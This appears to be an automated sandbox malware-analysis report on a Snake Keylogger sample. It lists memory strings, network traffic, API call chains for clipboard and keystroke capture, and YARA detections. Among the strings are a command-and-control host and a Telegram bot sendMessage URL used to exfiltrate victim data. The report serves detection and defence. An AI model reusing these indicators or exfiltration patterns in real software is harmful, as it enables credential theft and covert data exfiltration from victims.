Source: savagenesses.exe, 00000002.00000002.2103334932.0000000000990000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4522071961.0000000003241000.00000004.00000800.00020000.00000000.sdmp, savagenesses.exe, 00000005.00000002.2244066491.0000000000F10000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2556948372.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2558253285.0000000002B11000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://varders.kozow.com:8081
Source: RegSvcs.exe, 00000003.00000002.4524527218.0000000004261000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: RegSvcs.exe, 00000003.00000002.4522071961.0000000003327000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: savagenesses.exe, 00000002.00000002.2103334932.0000000000990000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4522071961.0000000003327000.00000004.00000800.00020000.00000000.sdmp, savagenesses.exe, 00000005.00000002.2244066491.0000000000F10000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2556948372.0000000000402000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: RegSvcs.exe, 00000003.00000002.4522071961.0000000003327000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: RegSvcs.exe, 00000003.00000002.4522071961.0000000003327000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:019635%0D%0ADate%20a
Source: RegSvcs.exe, 00000003.00000002.4524527218.0000000004261000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: RegSvcs.exe, 00000003.00000002.4524527218.0000000004261000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: RegSvcs.exe, 00000003.00000002.4524527218.0000000004261000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: RegSvcs.exe, 00000003.00000002.4522071961.0000000003403000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: RegSvcs.exe, 00000003.00000002.4522071961.00000000033FE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
Source: RegSvcs.exe, 00000003.00000002.4524527218.0000000004261000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: RegSvcs.exe, 00000003.00000002.4524527218.0000000004261000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: RegSvcs.exe, 00000003.00000002.4524527218.0000000004261000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: RegSvcs.exe, 00000003.00000002.4522071961.0000000003327000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4522071961.0000000003300000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4522071961.0000000003291000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: savagenesses.exe, 00000002.00000002.2103334932.0000000000990000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4522071961.0000000003291000.00000004.00000800.00020000.00000000.sdmp, savagenesses.exe, 00000005.00000002.2244066491.0000000000F10000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2556948372.0000000000402000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: RegSvcs.exe, 00000003.00000002.4522071961.00000000032BB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
Source: RegSvcs.exe, 00000003.00000002.4522071961.0000000003327000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4522071961.0000000003300000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4522071961.00000000032BB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
Source: RegSvcs.exe, 00000003.00000002.4524527218.0000000004261000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: RegSvcs.exe, 00000003.00000002.4524527218.0000000004261000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: RegSvcs.exe, 00000003.00000002.4522071961.0000000003434000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4522071961.000000000334C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4522071961.0000000003425000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/
Source: RegSvcs.exe, 00000003.00000002.4522071961.000000000342F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/lB

Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown	Network traffic detected: HTTP traffic on port 49835 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49829 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49829
Source: unknown	Network traffic detected: HTTP traffic on port 49811 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49835
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49811

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49835 version: TLS 1.2

Source: C:\Users\user\Desktop\YJwE2gTm02.exe

Code function: 0_2_0097EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

0_2_0097EAFF

Source: C:\Users\user\Desktop\YJwE2gTm02.exe	Code function: 0_2_0097ED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,		0_2_0097ED6A
Source: C:\Users\user\AppData\Local\toggeries\savagenesses.exe	Code function: 2_2_00FEED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,		2_2_00FEED6A

Source: C:\Users\user\Desktop\YJwE2gTm02.exe

0_2_0097EAFF

Source: C:\Users\user\Desktop\YJwE2gTm02.exe

Code function: 0_2_0096AA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,

0_2_0096AA57

Source: C:\Users\user\Desktop\YJwE2gTm02.exe	Code function: 0_2_00999576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,		0_2_00999576
Source: C:\Users\user\AppData\Local\toggeries\savagenesses.exe	Code function: 2_2_01009576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,		2_2_01009576

System Summary

Malicious sample detected (through community Yara rule)

Source: 5.2.savagenesses.exe.f10000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 5.2.savagenesses.exe.f10000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 5.2.savagenesses.exe.f10000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 2.2.savagenesses.exe.990000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 2.2.savagenesses.exe.990000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 2.2.savagenesses.exe.990000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 5.2.savagenesses.exe.f10000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 5.2.savagenesses.exe.f10000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 5.2.savagenesses.exe.f10000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 2.2.savagenesses.exe.990000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 2.2.savagenesses.exe.990000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 2.2.savagenesses.exe.990000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000005.00000002.2244066491.0000000000F10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000005.00000002.2244066491.0000000000F10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000005.00000002.2244066491.0000000000F10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000002.00000002.2103334932.0000000000990000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000002.00000002.2103334932.0000000000990000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000002.00000002.2103334932.0000000000990000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000007.00000002.2556948372.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: savagenesses.exe PID: 2636, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: savagenesses.exe PID: 3620, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: RegSvcs.exe PID: 5552, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown

Binary is likely a compiled AutoIt script file

Source: YJwE2gTm02.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: YJwE2gTm02.exe, 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_ae768604-a
Source: YJwE2gTm02.exe, 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_e6c1dbf8-8
Source: YJwE2gTm02.exe, 00000000.00000003.2070743556.00000000040E1000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_fd76e04c-b
Source: YJwE2gTm02.exe, 00000000.00000003.2070743556.00000000040E1000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_6922c36c-e
Source: savagenesses.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: savagenesses.exe, 00000002.00000002.2104346971.0000000001032000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_5ba48830-0
Source: savagenesses.exe, 00000002.00000002.2104346971.0000000001032000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_a55e69d3-4
Source: savagenesses.exe, 00000005.00000002.2244435594.0000000001032000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_6e94c423-1
Source: savagenesses.exe, 00000005.00000002.2244435594.0000000001032000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_e4939018-8
Source: YJwE2gTm02.exe	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_aaa52cf8-f
Source: YJwE2gTm02.exe	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_cf0e82e4-0
Source: savagenesses.exe.0.dr	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_dac7725e-3
Source: savagenesses.exe.0.dr	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_ef5c68d6-e

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Jump to behavior

Source: C:\Users\user\Desktop\YJwE2gTm02.exe

Code function: 0_2_0096D5EB: CreateFileW,DeviceIoControl,CloseHandle,

0_2_0096D5EB

Source: C:\Users\user\Desktop\YJwE2gTm02.exe

Code function: 0_2_00961201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

0_2_00961201

Source: C:\Users\user\Desktop\YJwE2gTm02.exe	Code function: 0_2_0096E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,		0_2_0096E8F6
Source: C:\Users\user\AppData\Local\toggeries\savagenesses.exe	Code function: 2_2_00FDE8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,		2_2_00FDE8F6

Source: C:\Users\user\Desktop\YJwE2gTm02.exe	Code function: 0_2_00972046	0_2_00972046
Source: C:\Users\user\Desktop\YJwE2gTm02.exe	Code function: 0_2_00908060	0_2_00908060
Source: C:\Users\user\Desktop\YJwE2gTm02.exe	Code function: 0_2_00968298	0_2_00968298
Source: C:\Users\user\Desktop\YJwE2gTm02.exe	Code function: 0_2_0093E4FF	0_2_0093E4FF
Source: C:\Users\user\Desktop\YJwE2gTm02.exe	Code function: 0_2_0093676B	0_2_0093676B
Source: C:\Users\user\Desktop\YJwE2gTm02.exe	Code function: 0_2_00994873	0_2_00994873
Source: C:\Users\user\Desktop\YJwE2gTm02.exe	Code function: 0_2_0092CAA0	0_2_0092CAA0
